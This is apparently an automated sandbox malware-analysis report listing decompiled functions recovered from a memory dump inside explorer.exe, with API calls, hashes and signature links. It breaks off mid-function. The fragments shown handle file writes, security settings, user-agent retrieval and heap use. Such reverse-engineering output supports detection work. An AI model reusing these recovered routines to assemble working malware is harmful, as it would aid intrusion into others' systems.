                            • Opcode ID: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
                            • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
                            • Opcode Fuzzy Hash: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
                            • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085AFF, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00085AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E00088604(0x14);
				_t38 =  *0x9e688; // 0xb0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E00082DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E00084D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E0008A39E();
				E0008A39E();
				return _t47;
			}

















                            0x00085aff
                            0x00085aff
                            0x00085b0a
                            0x00085b0c
                            0x00085b12
                            0x00085b18
                            0x00085b22
                            0x00085b2b
                            0x00085b36
                            0x00085b41
                            0x00085b47
                            0x00085b4f
                            0x00085b4f
                            0x00085b55
                            0x00085b5b
                            0x00085b5e
                            0x00085b69
                            0x00085b71
                            0x00085b73
                            0x00085b78
                            0x00085b98
                            0x00085b9f
                            0x00000000
                            0x00085ba1
                            0x00085ba1
                            0x00085ba1
                            0x00085b7a
                            0x00085b7a
                            0x00085b7c
                            0x00085b80
                            0x00000000
                            0x00085b82
                            0x00085b82
                            0x00085b85
                            0x00085b8b
                            0x00085b8e
                            0x00000000
                            0x00085b90
                            0x00000000
                            0x00085b90
                            0x00000000
                            0x00085b8e
                            0x00085b96
                            0x00085ba6
                            0x00085ba8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00085b96
                            0x00085b80
                            0x00085bad
                            0x00085bb0
                            0x00085bb8
                            0x00085bc3

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateDriveHeapType
                            • String ID:
                            • API String ID: 414167704-0
                            • Opcode ID: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                            • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
                            • Opcode Fuzzy Hash: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                            • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BC7A, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                            Download Yara Rule
                            C-Code - Quality: 44%
                            			E0008BC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0x9e674; // 0x214
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000895E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0x9e68c; // 0x286fab8
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0x9e68c; // 0x286fab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0x9e68c; // 0x286fab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0x9e68c; // 0x286fab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000885D5( &_v24);
				return _t39;
			}















                            0x0008bc81
                            0x0008bc84
                            0x0008bc8f
                            0x0008bc92
                            0x0008bc95
                            0x0008bc98
                            0x0008bc9b
                            0x0008bca1
                            0x0008bca5
                            0x0008bca8
                            0x0008bca9
                            0x0008bcab
                            0x0008bcac
                            0x0008bcb9
                            0x0008bcbe
                            0x0008bcc2
                            0x0008bcc6
                            0x0008bcc7
                            0x0008bccc
                            0x0008bcd7
                            0x0008bcd9
                            0x0008bcdc
                            0x0008bce1
                            0x0008bce2
                            0x0008bce3
                            0x0008bce4
                            0x0008bce6
                            0x0008bce8
                            0x0008bcf1
                            0x0008bcf3
                            0x0008bcf3
                            0x0008bcf1
                            0x0008bcf4
                            0x0008bcfd
                            0x0008bcfd
                            0x0008bd04
                            0x0008bd0f

                            APIs
                            • SetSecurityInfo.ADVAPI32(00000214,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity
                            • String ID:
                            • API String ID: 3528565900-0
                            • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                            • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                            • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                            • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008E450, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E0008E450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x9e6b0; // 0x2853258
				if( *_t5 == 0) {
					_v8 = E000895C7(0x2a7);
					 *0x9e788 = E000891A6(_t6, 0);
					E000885C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E00088604(0x101);
					 *0x9e788 = _t10;
					_t11 =  *0x9e6b0; // 0x2853258
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
					}
				}
			}








                            0x0008e453
                            0x0008e454
                            0x0008e45c
                            0x0008e4a6
                            0x0008e4b3
                            0x0008e4b8
                            0x00000000
                            0x0008e45e
                            0x0008e463
                            0x0008e46a
                            0x0008e473
                            0x0008e47a
                            0x0008e481
                            0x0008e485
                            0x0008e4bd
                            0x0008e4c0
                            0x0008e487
                            0x0008e499
                            0x0008e499
                            0x0008e485

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AgentAllocateFreeObtainStringUser
                            • String ID:
                            • API String ID: 471734292-0
                            • Opcode ID: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
                            • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
                            • Opcode Fuzzy Hash: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
                            • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









                            0x0008a65c
                            0x0008a65f
                            0x0008a660
                            0x0008a663
                            0x0008a665
                            0x0008a668
                            0x0008a66d
                            0x0008a69e
                            0x0008a6a0
                            0x0008a66f
                            0x0008a66f
                            0x0008a66f
                            0x0008a691
                            0x00000000
                            0x00000000
                            0x0008a693
                            0x0008a696
                            0x0008a69c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008a69c
                            0x0008a6a5
                            0x0008a6a5
                            0x0008a6a1
                            0x0008a6a4

                            APIs
                            • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                            • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                            • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                            • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0x286f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






                            0x0008a601
                            0x0008a615
                            0x0008a61a
                            0x0008a623
                            0x0008a625
                            0x0008a62f
                            0x0008a62f
                            0x00000000
                            0x0008a635
                            0x00000000

                            APIs
                            • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                            • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                            • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                            • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




                            0x0008a64f
                            0x0008a652
                            0x0008a657
                            0x0008a65b

                            APIs
                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                            • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                            • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                            • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}




                            0x00088612
                            0x00088619

                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                            • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                            • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                            • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B269, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008B269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}



                            0x0008b27c

                            APIs
                            • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                            • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                            • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                            • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}




                            0x000885f8
                            0x000885fe
                            0x00088603

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                            • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                            • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                            • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119sleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0x286fd30
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0x286fd30
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xb0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xb0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0x286fd30
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0x286fd30
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xb0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0x286fd30
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0);
				}
				return 0;
			}

























                            0x0008f9c5
                            0x0008f9cd
                            0x0008f9d2
                            0x0008f9d8
                            0x0008f9de
                            0x0008f9f1
                            0x0008f9fb
                            0x0008fa05
                            0x0008fa08
                            0x0008fa0d
                            0x0008fa23
                            0x0008fa27
                            0x0008fa2c
                            0x0008fa2d
                            0x0008fa2e
                            0x0008fa33
                            0x0008fa36
                            0x0008fa37
                            0x0008fa38
                            0x0008fa3d
                            0x0008fa4c
                            0x0008fa51
                            0x0008fa56
                            0x0008fa5d
                            0x0008fa66
                            0x0008fa6b
                            0x0008fa6e
                            0x0008fa71
                            0x0008fa76
                            0x0008fa7c
                            0x0008fa81
                            0x0008fa86
                            0x0008fa89
                            0x0008fa9c
                            0x0008faa1
                            0x0008faa4
                            0x0008faa4
                            0x0008faac
                            0x0008fab7
                            0x0008fabc
                            0x0008fabf
                            0x0008fac2
                            0x0008fac2
                            0x0008fac8
                            0x0008faca
                            0x0008face
                            0x0008fad9
                            0x0008fade
                            0x0008fae3
                            0x00000000
                            0x00000000
                            0x0008faec
                            0x0008faf2
                            0x0008faf9
                            0x0008fafb
                            0x0008fafe
                            0x00000000
                            0x0008fafe
                            0x00000000
                            0x0008faf9
                            0x0008fb0b
                            0x0008fb14
                            0x0008fb18

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapSleep
                            • String ID:
                            • API String ID: 4201116106-0
                            • Opcode ID: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                            • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                            • Opcode Fuzzy Hash: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                            • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008896F, Relevance: 1.4, APIs: 1, Instructions: 107stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 97%
                            			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E00088604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E00088604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000887EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E0008861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x9e684; // 0x286f8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E0008861A(_t73, 0);
						}
						E0008861A( &_v20, 0);
						goto L1;
					}
					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x9e684; // 0x286f8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E0008861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}
















                            0x00088975
                            0x0008897c
                            0x0008897e
                            0x00088986
                            0x00088988
                            0x00088990
                            0x00088992
                            0x00088995
                            0x00088998
                            0x000889ac
                            0x000889b3
                            0x000889b9
                            0x000889c2
                            0x00088a1a
                            0x00088a1f
                            0x00088a28
                            0x00088a75
                            0x00088a78
                            0x00088a80
                            0x00088a84
                            0x00088a84
                            0x00088a89
                            0x00000000
                            0x00088a89
                            0x00088a2a
                            0x00088a2c
                            0x00088a34
                            0x00088a3a
                            0x00088a3b
                            0x00088a3b
                            0x00088a43
                            0x00088a46
                            0x00088a4b
                            0x00088a4b
                            0x00088a4e
                            0x00088a57
                            0x00088a5c
                            0x00088a62
                            0x00088a69
                            0x00000000
                            0x00088a6f
                            0x000889cb
                            0x000889d0
                            0x000889d2
                            0x000889d9
                            0x00000000
                            0x00000000
                            0x000889ee
                            0x00000000
                            0x000889f0
                            0x000889f0
                            0x000889fb
                            0x000889fe
                            0x00088a0b
                            0x00000000
                            0x00088a11
                            0x000889ee
                            0x0008899a
                            0x00000000

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcpyn
                            • String ID:
                            • API String ID: 680773602-0
                            • Opcode ID: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                            • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                            • Opcode Fuzzy Hash: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                            • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008E2C6, Relevance: 1.3, APIs: 1, Instructions: 92sleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E0008E2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				void* _t52;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x9e6b4; // 0x286fa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x9e6b4; // 0x286fa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
